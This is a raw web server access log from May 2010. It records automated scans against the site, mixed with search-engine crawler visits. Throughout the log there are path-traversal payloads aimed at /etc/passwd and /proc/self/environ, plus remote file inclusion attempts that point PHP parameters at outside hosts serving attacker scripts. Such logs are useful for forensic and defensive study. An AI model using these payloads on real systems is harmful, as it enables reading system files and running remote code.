64.71.32.29 - - [24/May/2010:00:25:38 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.813"
87.250.255.243 - - [24/May/2010:00:27:09 -0500] "GET /logs/access_log.1205712000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [24/May/2010:00:28:44 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:28:45 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:28:48 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
216.129.119.43 - - [24/May/2010:00:28:59 -0500] "GET /logs/access_log.1262995200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
124.217.229.185 - - [24/May/2010:00:29:07 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:29:08 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:29:09 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
89.163.148.130 - - [24/May/2010:00:29:46 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-"""
124.217.229.185 - - [24/May/2010:00:30:07 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:30:17 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:30:53 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:30:55 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:30:57 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:05 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:06 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:09 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:21 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:24 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:32 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:39 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:40 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:48 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:31:49 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:32:03 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:32:04 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
84.40.30.37 - - [24/May/2010:00:32:08 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:32:08 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:32:13 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:32:14 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:32:14 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:32:15 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:00:32:42 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:32:43 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.195.112.180 - - [24/May/2010:00:32:48 -0500] "GET /logs/access_log.1209081600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.217.229.185 - - [24/May/2010:00:33:28 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:33:29 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
163.24.136.10 - - [24/May/2010:00:33:29 -0500] "GET /logs/http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
163.24.136.10 - - [24/May/2010:00:33:30 -0500] "GET /http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
173.203.115.77 - - [24/May/2010:00:34:13 -0500] "GET /logs/access_log.1208995200/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
163.24.136.10 - - [24/May/2010:00:34:27 -0500] "GET /logs/http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
163.24.136.10 - - [24/May/2010:00:34:28 -0500] "GET /http://localhost/[path]/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
124.217.229.185 - - [24/May/2010:00:34:29 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
173.203.115.77 - - [24/May/2010:00:34:30 -0500] "GET /logs/access_log.1208995200/index2.php?option=com_juser&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
124.217.229.185 - - [24/May/2010:00:34:30 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
84.40.30.37 - - [24/May/2010:00:35:10 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:35:11 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:35:11 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:35:40 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:35:40 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:35:40 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.195.112.180 - - [24/May/2010:00:36:12 -0500] "GET /logs/access_log.1162684800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [24/May/2010:00:36:33 -0500] "GET /logs/access_log.1174953600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
163.24.136.10 - - [24/May/2010:00:36:51 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
163.24.136.10 - - [24/May/2010:00:36:52 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
124.217.229.185 - - [24/May/2010:00:37:31 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:37:32 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
207.46.13.136 - - [24/May/2010:00:37:32 -0500] "GET /logs/access_log.1231804800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.149.84.14 - - [24/May/2010:00:37:33 -0500] "GET //forums/toplist.php?f=toplist_top10&phpbb_root_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.149.84.14 - - [24/May/2010:00:37:33 -0500] "GET /logs//forums/toplist.php?f=toplist_top10&phpbb_root_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.149.84.14 - - [24/May/2010:00:37:33 -0500] "GET /logs/access_log.1262822400//forums/toplist.php?f=toplist_top10&phpbb_root_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
189.108.172.26 - - [24/May/2010:00:37:43 -0500] "GET /logs/index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
189.108.172.26 - - [24/May/2010:00:37:44 -0500] "GET /index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
218.149.84.14 - - [24/May/2010:00:37:47 -0500] "GET //forums/toplist.php?f=toplist_top10&phpbb_root_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.149.84.14 - - [24/May/2010:00:37:47 -0500] "GET /logs//forums/toplist.php?f=toplist_top10&phpbb_root_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.149.84.14 - - [24/May/2010:00:37:47 -0500] "GET /logs/access_log.1262822400//forums/toplist.php?f=toplist_top10&phpbb_root_path=http://clamav.webs.com/d32n/id1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
163.24.136.10 - - [24/May/2010:00:37:50 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
163.24.136.10 - - [24/May/2010:00:37:50 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
189.108.172.26 - - [24/May/2010:00:38:00 -0500] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
189.108.172.26 - - [24/May/2010:00:38:01 -0500] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
84.40.30.37 - - [24/May/2010:00:38:09 -0500] "GET /logs/access_log.1271116800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
64.251.10.117 - - [24/May/2010:00:38:28 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
124.217.229.185 - - [24/May/2010:00:38:28 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
64.251.10.117 - - [24/May/2010:00:38:28 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
124.217.229.185 - - [24/May/2010:00:38:29 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
64.251.10.117 - - [24/May/2010:00:38:30 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.251.10.117 - - [24/May/2010:00:38:30 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
124.217.229.185 - - [24/May/2010:00:38:30 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:38:31 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
207.46.195.228 - - [24/May/2010:00:38:32 -0500] "GET /logs/access_log.1228521600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [24/May/2010:00:38:43 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:38:50 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
174.121.213.196 - - [24/May/2010:00:39:46 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.213.196 - - [24/May/2010:00:39:46 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.250.255.243 - - [24/May/2010:00:40:45 -0500] "GET /logs/access_log.1202515200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [24/May/2010:00:41:41 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:41:42 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:41:58 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:41:58 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:41:58 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:41:59 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:41:59 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:42:02 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:42:11 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:42:12 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
174.121.213.196 - - [24/May/2010:00:43:08 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.213.196 - - [24/May/2010:00:43:08 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:43:17 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:43:21 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
84.40.30.37 - - [24/May/2010:00:43:28 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:28 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:29 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:31 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:31 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:31 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:34 -0500] "GET /logs/access_log.1271116800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:53 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:53 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:53 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:57 -0500] "GET /skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:57 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [24/May/2010:00:43:57 -0500] "GET /logs/access_log.1271548800/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 335 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:00:45:26 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:45:27 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:45:36 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:45:37 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:45:38 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:45:39 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
188.165.68.4 - - [24/May/2010:00:45:42 -0500] "GET /logs/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
188.165.68.4 - - [24/May/2010:00:45:42 -0500] "GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
124.217.229.185 - - [24/May/2010:00:45:59 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:46:03 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
203.170.81.238 - - [24/May/2010:00:46:18 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.832"
203.170.81.238 - - [24/May/2010:00:46:19 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
188.165.68.4 - - [24/May/2010:00:46:59 -0500] "GET /logs////?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6788 "-""libwww-perl/5.805"
188.165.68.4 - - [24/May/2010:00:46:59 -0500] "GET ////?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1005 "-""libwww-perl/5.805"
207.46.195.231 - - [24/May/2010:00:47:02 -0500] "GET /logs/access_log.1202774400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [24/May/2010:00:47:10 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:47:11 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
67.195.112.180 - - [24/May/2010:00:47:30 -0500] "GET /logs/access_log.1243468800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.65.166.74 - - [24/May/2010:00:48:08 -0500] "GET /logs///index1.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
80.65.166.74 - - [24/May/2010:00:48:09 -0500] "GET ///index1.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
124.217.229.185 - - [24/May/2010:00:48:52 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:48:53 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:49:13 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:49:14 -0500] "GET //projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:00:49:22 -0500] "GET /logs//projects/TotalCalendar_2/box_display.php?box=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 330 "-""libwww-perl/5.810"
80.65.166.74 - - [24/May/2010:00:49:24 -0500] "GET /logs///index1.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
80.65.166.74 - - [24/May/2010:00:49:24 -0500] "GET ///index1.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.831"
80.65.166.74 - - [24/May/2010:00:49:24 -0500] "GET /logs///index1.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.831"
